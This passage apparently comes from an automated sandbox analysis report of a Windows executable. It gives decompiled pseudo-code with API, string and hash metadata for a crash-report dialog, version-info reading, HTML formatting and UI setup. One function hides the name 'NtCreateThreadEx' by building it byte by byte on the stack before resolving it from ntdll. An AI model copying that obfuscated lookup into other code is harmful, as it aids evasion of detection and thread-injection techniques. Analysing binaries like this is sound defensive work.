                                                                                                                				void _v5674;
                                                                                                                				char _v5676;
                                                                                                                				void _v9770;
                                                                                                                				short _v9772;
                                                                                                                				void* __edi;
                                                                                                                				void* _t45;
                                                                                                                				void* _t60;
                                                                                                                				int _t61;
                                                                                                                				int _t63;
                                                                                                                				int _t64;
                                                                                                                				long _t68;
                                                                                                                				struct HWND__* _t94;
                                                                                                                				signed int _t103;
                                                                                                                				intOrPtr _t127;
                                                                                                                				unsigned int _t130;
                                                                                                                				void* _t132;
                                                                                                                				void* _t135;
                                                                                                                
                                                                                                                				E0040B550(0x2628, __ecx);
                                                                                                                				_t45 = _a8 - 0x110;
                                                                                                                				if(_t45 == 0) {
                                                                                                                					E00404DA9(__edx, _a4, 4);
                                                                                                                					_v9772 = 0;
                                                                                                                					memset( &_v9770, 0, 0xffe);
                                                                                                                					_t103 = 5;
                                                                                                                					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
                                                                                                                					memset( &_v1560, 0, 0x1f6);
                                                                                                                					_v260 = 0;
                                                                                                                					memset( &_v259, 0, 0xff);
                                                                                                                					_v516 = 0;
                                                                                                                					memset( &_v515, 0, 0xff);
                                                                                                                					_v5676 = 0;
                                                                                                                					memset( &_v5674, 0, 0x7fe);
                                                                                                                					_v3628 = 0;
                                                                                                                					memset( &_v3626, 0, 0x7fe);
                                                                                                                					_t135 = _t132 + 0x5c;
                                                                                                                					_t60 = GetCurrentProcess();
                                                                                                                					_t105 =  &_v260;
                                                                                                                					_a8 = _t60;
                                                                                                                					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
                                                                                                                					__eflags = _t61;
                                                                                                                					if(_t61 != 0) {
                                                                                                                						E00404FE0( &_v5676,  &_v260, 4);
                                                                                                                						_pop(_t105);
                                                                                                                					}
                                                                                                                					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
                                                                                                                					__eflags = _t63;
                                                                                                                					if(_t63 != 0) {
                                                                                                                						E00404FE0( &_v3628,  &_v516, 0);
                                                                                                                						_pop(_t105);
                                                                                                                					}
                                                                                                                					_t64 = E00404BD3();
                                                                                                                					__eflags = _t64;
                                                                                                                					if(_t64 == 0) {
                                                                                                                						E004090EE();
                                                                                                                					} else {
                                                                                                                						E00409172();
                                                                                                                					}
                                                                                                                					__eflags =  *0x4101b8;
                                                                                                                					if(__eflags != 0) {
                                                                                                                						L17:
                                                                                                                						_v1056 = 0;
                                                                                                                						memset( &_v1052, 0, 0x218);
                                                                                                                						_t127 =  *0x40f5d4; // 0x0
                                                                                                                						_t135 = _t135 + 0xc;
                                                                                                                						_t68 = GetCurrentProcessId();
                                                                                                                						_push(_t127);
                                                                                                                						_push(_t68);
                                                                                                                						 *0x40f84c = 0;
                                                                                                                						E004092F0(_t105, __eflags);
                                                                                                                						__eflags =  *0x40f84c; // 0x0
                                                                                                                						if(__eflags != 0) {
                                                                                                                							memcpy( &_v1056, 0x40f850, 0x21c);
                                                                                                                							_t135 = _t135 + 0xc;
                                                                                                                							__eflags =  *0x40f84c; // 0x0
                                                                                                                							if(__eflags != 0) {
                                                                                                                								wcscpy( &_v1580, E00404B3E( &_v1048));
                                                                                                                							}
                                                                                                                						}
                                                                                                                						goto L20;
                                                                                                                					} else {
                                                                                                                						__eflags =  *0x4101bc;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							L20:
                                                                                                                							_push( &_v3628);
                                                                                                                							_push( &_v5676);
                                                                                                                							_push( *0x40f3b0);
                                                                                                                							_push( *0x40f3bc);
                                                                                                                							_push( *0x40f3ac);
                                                                                                                							_push( *0x40f394);
                                                                                                                							_push( *0x40f398);
                                                                                                                							_push( *0x40f3a0);
                                                                                                                							_push( *0x40f3a4);
                                                                                                                							_push( *0x40f39c);
                                                                                                                							_push( *0x40f3a8);
                                                                                                                							_push( &_v1580);
                                                                                                                							_push( *0x40f5d4);
                                                                                                                							_push( *0x40f5c8);
                                                                                                                							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
                                                                                                                							_push(0x800);
                                                                                                                							_push( &_v9772);
                                                                                                                							L0040B1EC();
                                                                                                                							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
                                                                                                                							SetFocus(GetDlgItem(_a4, 0x3ea));
                                                                                                                							L21:
                                                                                                                							return 0;
                                                                                                                						}
                                                                                                                						goto L17;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				if(_t45 == 1) {
                                                                                                                					_t130 = _a12;
                                                                                                                					if(_t130 >> 0x10 == 0) {
                                                                                                                						if(_t130 == 3) {
                                                                                                                							_t94 = GetDlgItem(_a4, 0x3ea);
                                                                                                                							_a4 = _t94;
                                                                                                                							SendMessageW(_t94, 0xb1, 0, 0xffff);
                                                                                                                							SendMessageW(_a4, 0x301, 0, 0);
                                                                                                                							SendMessageW(_a4, 0xb1, 0, 0);
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				goto L21;
                                                                                                                			}

                                                                                                                0x00408d28
                                                                                                                0x00408d2e
                                                                                                                0x00408d35
                                                                                                                0x00408d36
                                                                                                                0x00408d42
                                                                                                                0x00408d48
                                                                                                                0x00408d4e
                                                                                                                0x00408d54
                                                                                                                0x00408d5a
                                                                                                                0x00408d60
                                                                                                                0x00408d66
                                                                                                                0x00408d6c
                                                                                                                0x00408d72
                                                                                                                0x00408d73
                                                                                                                0x00408d7f
                                                                                                                0x00408d85
                                                                                                                0x00408d8a
                                                                                                                0x00408d8f
                                                                                                                0x00408d90
                                                                                                                0x00408da8
                                                                                                                0x00408db9
                                                                                                                0x00408dbf
                                                                                                                0x00408dc5
                                                                                                                0x00408dc5
                                                                                                                0x00000000
                                                                                                                0x00408cad
                                                                                                                0x00408ca5
                                                                                                                0x00408af6
                                                                                                                0x00408afc
                                                                                                                0x00408b07
                                                                                                                0x00408b2a
                                                                                                                0x00408b38
                                                                                                                0x00408b53
                                                                                                                0x00408b56
                                                                                                                0x00408b62
                                                                                                                0x00408b6a
                                                                                                                0x00408b6a
                                                                                                                0x00408b2a
                                                                                                                0x00408b07
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • {Unknown}, xrefs: 00408BA5
                                                                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                • API String ID: 4111938811-1819279800
                                                                                                                • Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                                • Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
                                                                                                                • Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                                • Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 82%
                                                                                                                			E0040B04D(intOrPtr* __edi, short* _a4) {
                                                                                                                				int _v8;
                                                                                                                				void* _v12;
                                                                                                                				void* _v16;
                                                                                                                				int _v20;
                                                                                                                				long _v60;
                                                                                                                				char _v572;
                                                                                                                				void* __esi;
                                                                                                                				int _t47;
                                                                                                                				void* _t50;
                                                                                                                				signed short* _t76;
                                                                                                                				void* _t81;
                                                                                                                				void* _t84;
                                                                                                                				intOrPtr* _t96;
                                                                                                                				int _t97;
                                                                                                                
                                                                                                                				_t96 = __edi;
                                                                                                                				_t97 = 0;
                                                                                                                				_v20 = 0;
                                                                                                                				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
                                                                                                                				_v8 = _t47;
                                                                                                                				if(_t47 > 0) {
                                                                                                                					_t50 = E00405AA7(__edi);
                                                                                                                					_push(_v8);
                                                                                                                					L0040B26C();
                                                                                                                					_t84 = _t50;
                                                                                                                					GetFileVersionInfoW(_a4, 0, _v8, _t84);
                                                                                                                					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
                                                                                                                						_t81 = _v12;
                                                                                                                						_t11 = _t81 + 0x30; // 0x4d46e853
                                                                                                                						 *((intOrPtr*)(__edi + 4)) =  *_t11;
                                                                                                                						_t13 = _t81 + 8; // 0x8d50ffff
                                                                                                                						 *__edi =  *_t13;
                                                                                                                						_t14 = _t81 + 0x14; // 0x5900004d
                                                                                                                						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
                                                                                                                						_t16 = _t81 + 0x10; // 0x65e850ff
                                                                                                                						 *((intOrPtr*)(__edi + 8)) =  *_t16;
                                                                                                                						_t18 = _t81 + 0x24; // 0xf4680000
                                                                                                                						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
                                                                                                                						_t20 = _t81 + 0x28; // 0xbb0040cd
                                                                                                                						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
                                                                                                                					}
                                                                                                                					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
                                                                                                                						L5:
                                                                                                                						wcscpy( &_v60, L"040904E4");
                                                                                                                					} else {
                                                                                                                						_t76 = _v16;
                                                                                                                						_push(_t76[1] & 0x0000ffff);
                                                                                                                						_push( *_t76 & 0x0000ffff);
                                                                                                                						_push(L"%4.4X%4.4X");
                                                                                                                						_push(0x14);
                                                                                                                						_push( &_v60);
                                                                                                                						L0040B1EC();
                                                                                                                						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
                                                                                                                							goto L5;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
                                                                                                                					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
                                                                                                                					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
                                                                                                                					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
                                                                                                                					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
                                                                                                                					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
                                                                                                                					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
                                                                                                                					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
                                                                                                                					_push(_t84);
                                                                                                                					_t97 = 1;
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				return _t97;
                                                                                                                			}


















                                                                                                                APIs
                                                                                                                • GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                                • GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                                • VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                                • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                                • _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                                • wcscpy.MSVCRT ref: 0040B128
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B1D8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                                                                • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                • API String ID: 1223191525-1542517562
                                                                                                                • Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                                • Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
                                                                                                                • Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                                • Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 76%
                                                                                                                			E0040A1EF(struct HINSTANCE__** __esi) {
                                                                                                                				char _v8;
                                                                                                                				char _v9;
                                                                                                                				char _v10;
                                                                                                                				char _v11;
                                                                                                                				char _v12;
                                                                                                                				char _v13;
                                                                                                                				char _v14;
                                                                                                                				char _v15;
                                                                                                                				char _v16;
                                                                                                                				char _v17;
                                                                                                                				char _v18;
                                                                                                                				char _v19;
                                                                                                                				char _v20;
                                                                                                                				char _v21;
                                                                                                                				char _v22;
                                                                                                                				char _v23;
                                                                                                                				char _v24;
                                                                                                                				struct HINSTANCE__* _t27;
                                                                                                                
                                                                                                                				if( *__esi != 0) {
                                                                                                                					L3:
                                                                                                                					return 1;
                                                                                                                				}
                                                                                                                				_t27 = LoadLibraryW(L"ntdll.dll");
                                                                                                                				 *__esi = _t27;
                                                                                                                				if(_t27 != 0) {
                                                                                                                					asm("stosd");
                                                                                                                					asm("stosd");
                                                                                                                					asm("stosd");
                                                                                                                					asm("stosd");
                                                                                                                					asm("stosw");
                                                                                                                					asm("stosb");
                                                                                                                					_v24 = 0x4e;
                                                                                                                					_v23 = 0x74;
                                                                                                                					_v13 = 0x65;
                                                                                                                					_v12 = 0x61;
                                                                                                                					_v18 = 0x74;
                                                                                                                					_v17 = 0x65;
                                                                                                                					_v22 = 0x43;
                                                                                                                					_v14 = 0x72;
                                                                                                                					_v11 = 0x64;
                                                                                                                					_v21 = 0x72;
                                                                                                                					_v10 = 0x45;
                                                                                                                					_v9 = 0x78;
                                                                                                                					_v20 = 0x65;
                                                                                                                					_v19 = 0x61;
                                                                                                                					_v16 = 0x54;
                                                                                                                					_v15 = 0x68;
                                                                                                                					_v8 = 0;
                                                                                                                					__esi[1] = GetProcAddress(_t27,  &_v24);
                                                                                                                					goto L3;
                                                                                                                				}
                                                                                                                				return 0;
                                                                                                                			}






















                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x
                                                                                                                • API String ID: 2574300362-1257427173
                                                                                                                • Opcode ID: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                                • Instruction ID: 28a3addb3bc40b583479f690f9d6e65064931713b616a12c977b5f47a4008353
                                                                                                                • Opcode Fuzzy Hash: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                                • Instruction Fuzzy Hash: 08110A2090C6C9EDEB12C7FCC40879EBEF15B26709F0881ECC585B6292C6BA5758C776
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 63%
                                                                                                                			E00407F8D(void* __eax) {
                                                                                                                				struct _SHFILEINFOW _v692;
                                                                                                                				void _v1214;
                                                                                                                				short _v1216;
                                                                                                                				void* _v1244;
                                                                                                                				void* _v1248;
                                                                                                                				void* _v1252;
                                                                                                                				void* _v1256;
                                                                                                                				void* _v1268;
                                                                                                                				void* _t37;
                                                                                                                				long _t38;
                                                                                                                				long _t46;
                                                                                                                				long _t48;
                                                                                                                				long _t58;
                                                                                                                				void* _t62;
                                                                                                                				intOrPtr* _t64;
                                                                                                                
                                                                                                                				_t64 = ImageList_Create;
                                                                                                                				_t62 = __eax;
                                                                                                                				if( *((intOrPtr*)(__eax + 0x2b4)) != 0) {
                                                                                                                					if( *((intOrPtr*)(__eax + 0x2bc)) == 0) {
                                                                                                                						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
                                                                                                                						 *(_t62 + 0x2a8) = _t48;
                                                                                                                						__imp__ImageList_SetImageCount(_t48, 0);
                                                                                                                						_push( *(_t62 + 0x2a8));
                                                                                                                					} else {
                                                                                                                						_v692.hIcon = 0;
                                                                                                                						memset( &(_v692.iIcon), 0, 0x2b0);
                                                                                                                						_v1216 = 0;
                                                                                                                						memset( &_v1214, 0, 0x208);
                                                                                                                						GetWindowsDirectoryW( &_v1216, 0x104);
                                                                                                                						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
                                                                                                                						 *(_t62 + 0x2a8) = _t58;
                                                                                                                						_push(_t58);
                                                                                                                					}
                                                                                                                					SendMessageW( *(_t62 + 0x2a0), 0x1003, 1, ??);
                                                                                                                				}
                                                                                                                				if( *((intOrPtr*)(_t62 + 0x2b8)) != 0) {
                                                                                                                					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
                                                                                                                					 *(_t62 + 0x2ac) = _t46;
                                                                                                                					__imp__ImageList_SetImageCount(_t46, 0);
                                                                                                                					SendMessageW( *(_t62 + 0x2a0), 0x1003, 0,  *(_t62 + 0x2ac));
                                                                                                                				}
                                                                                                                				 *(_t62 + 0x2a4) =  *_t64(0x10, 0x10, 0x19, 1, 1);
                                                                                                                				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
                                                                                                                				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
                                                                                                                				_v1244 = _t37;
                                                                                                                				__imp__ImageList_SetImageCount( *(_t62 + 0x2a4), 0);
                                                                                                                				_t38 = GetSysColor(0xf);
                                                                                                                				_v1248 = _t38;
                                                                                                                				ImageList_AddMasked( *(_t62 + 0x2a4), _v1256, _t38);
                                                                                                                				ImageList_AddMasked( *(_t62 + 0x2a4), _v1252, _v1248);
                                                                                                                				DeleteObject(_v1268);
                                                                                                                				DeleteObject(_v1268);
                                                                                                                				return SendMessageW(E0040331D( *(_t62 + 0x2a0)), 0x1208, 0,  *(_t62 + 0x2a4));
                                                                                                                			}



















                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00407FD0
                                                                                                                • memset.MSVCRT ref: 00407FE5
                                                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FF7
                                                                                                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00408015
                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040802E
                                                                                                                • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 00408038
                                                                                                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 00408051
                                                                                                                • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00408065
                                                                                                                • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 0040806F
                                                                                                                • SendMessageW.USER32(?,00001003,00000000,?), ref: 00408087
                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00408093
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004080A2
                                                                                                                • LoadImageW.USER32 ref: 004080B4
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004080BF
                                                                                                                • LoadImageW.USER32 ref: 004080D1
                                                                                                                • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004080E2
                                                                                                                • GetSysColor.USER32(0000000F), ref: 004080EA
                                                                                                                • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00408105
                                                                                                                • ImageList_AddMasked.COMCTL32(?,?,?), ref: 00408115
                                                                                                                • DeleteObject.GDI32(?), ref: 00408121
                                                                                                                • DeleteObject.GDI32(?), ref: 00408127
                                                                                                                • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00408144
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 304928396-0
                                                                                                                • Opcode ID: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                                • Instruction ID: fc02d650de5297a4f4a3b2912da131a5170d4a501b91b7a2a94f7b4638737e48
                                                                                                                • Opcode Fuzzy Hash: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                                • Instruction Fuzzy Hash: 8F418971640304FFE6306B61DD8AF977BACFF89B00F00092DB795A51D1DAB55450DB29
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 69%
                                                                                                                			E0040AE90(void* __esi, wchar_t* _a4, wchar_t* _a8) {
                                                                                                                				int _v8;
                                                                                                                				void _v518;
                                                                                                                				long _v520;
                                                                                                                				void _v1030;
                                                                                                                				char _v1032;
                                                                                                                				intOrPtr _t32;
                                                                                                                				wchar_t* _t57;
                                                                                                                				void* _t58;
                                                                                                                				void* _t59;
                                                                                                                				void* _t60;
                                                                                                                
                                                                                                                				_t58 = __esi;
                                                                                                                				_v520 = 0;
                                                                                                                				memset( &_v518, 0, 0x1fc);
                                                                                                                				_v1032 = 0;
                                                                                                                				memset( &_v1030, 0, 0x1fc);
                                                                                                                				_t60 = _t59 + 0x18;
                                                                                                                				_v8 = 1;
                                                                                                                				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
                                                                                                                					_v8 = 0;
                                                                                                                				}
                                                                                                                				_t57 = _a4;
                                                                                                                				 *_t57 = 0;
                                                                                                                				if(_v8 != 0) {
                                                                                                                					wcscpy(_t57, L"<font");
                                                                                                                					_t32 =  *((intOrPtr*)(_t58 + 8));
                                                                                                                					if(_t32 > 0) {
                                                                                                                						_push(_t32);
                                                                                                                						_push(L" size=\"%d\"");
                                                                                                                						_push(0xff);
                                                                                                                						_push( &_v520);
                                                                                                                						L0040B1EC();
                                                                                                                						wcscat(_t57,  &_v520);
                                                                                                                						_t60 = _t60 + 0x18;
                                                                                                                					}
                                                                                                                					_t33 =  *((intOrPtr*)(_t58 + 4));
                                                                                                                					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
                                                                                                                						_push(E0040ADC0(_t33,  &_v1032));
                                                                                                                						_push(L" color=\"#%s\"");
                                                                                                                						_push(0xff);
                                                                                                                						_push( &_v520);
                                                                                                                						L0040B1EC();
                                                                                                                						wcscat(_t57,  &_v520);
                                                                                                                					}
                                                                                                                					wcscat(_t57, ">");
                                                                                                                				}
                                                                                                                				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                                                                					wcscat(_t57, L"<b>");
                                                                                                                				}
                                                                                                                				wcscat(_t57, _a8);
                                                                                                                				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                                                                					wcscat(_t57, L"</b>");
                                                                                                                				}
                                                                                                                				if(_v8 != 0) {
                                                                                                                					wcscat(_t57, L"</font>");
                                                                                                                				}
                                                                                                                				return _t57;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                • API String ID: 3143752011-1996832678
                                                                                                                • Opcode ID: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                                • Instruction ID: 2e7f7f44a8c08f278b605cd2082ab28bfbf3198b566a778c3f72e8233e5ba29a
                                                                                                                • Opcode Fuzzy Hash: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                                • Instruction Fuzzy Hash: 2531C6B2904306A9D720EAA59D86E7E73BCDF40714F10807FF214B61C2DB7C9944D69D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 97%
                                                                                                                			E00403C03(void* __eflags) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __ecx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* _t88;
                                                                                                                				void* _t108;
                                                                                                                				void* _t113;
                                                                                                                				void* _t119;
                                                                                                                				void* _t121;
                                                                                                                				void* _t122;
                                                                                                                				void* _t123;
                                                                                                                				intOrPtr* _t124;
                                                                                                                				void* _t134;
                                                                                                                
                                                                                                                				_t113 = _t108;
                                                                                                                				E00403B3C(_t113);
                                                                                                                				E00403B16(_t113);
                                                                                                                				DragAcceptFiles( *(_t113 + 0x10), 1);
                                                                                                                				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73);
                                                                                                                				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
                                                                                                                				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
                                                                                                                				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
                                                                                                                				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10));
                                                                                                                				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14));
                                                                                                                				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
                                                                                                                				 *_t124 = 0x3ea;
                                                                                                                				E0040AD85(GetDlgItem(??, ??));
                                                                                                                				 *_t124 = 0x3f1;
                                                                                                                				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
                                                                                                                				E004049D9(_t49, E00405B81(0x259), 0x20);
                                                                                                                				E004049D9(_t49, E00405B81(0x25a), 0x40);
                                                                                                                				E004049D9(_t116, E00405B81(0x25b), 0x80);
                                                                                                                				E004049D9(_t116, E00405B81(0x25c), 0x100);
                                                                                                                				E004049D9(_t116, E00405B81(0x25d), 0x4000);
                                                                                                                				E004049D9(_t116, E00405B81(0x25e), 0x8000);
                                                                                                                				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
                                                                                                                				E004049D9(_t62, E00405B81(0x26c), 0);
                                                                                                                				E004049D9(_t62, E00405B81(0x26d), 1);
                                                                                                                				E004049D9(_t117, E00405B81(0x26e), 2);
                                                                                                                				E004049D9(_t117, E00405B81(0x26f), 3);
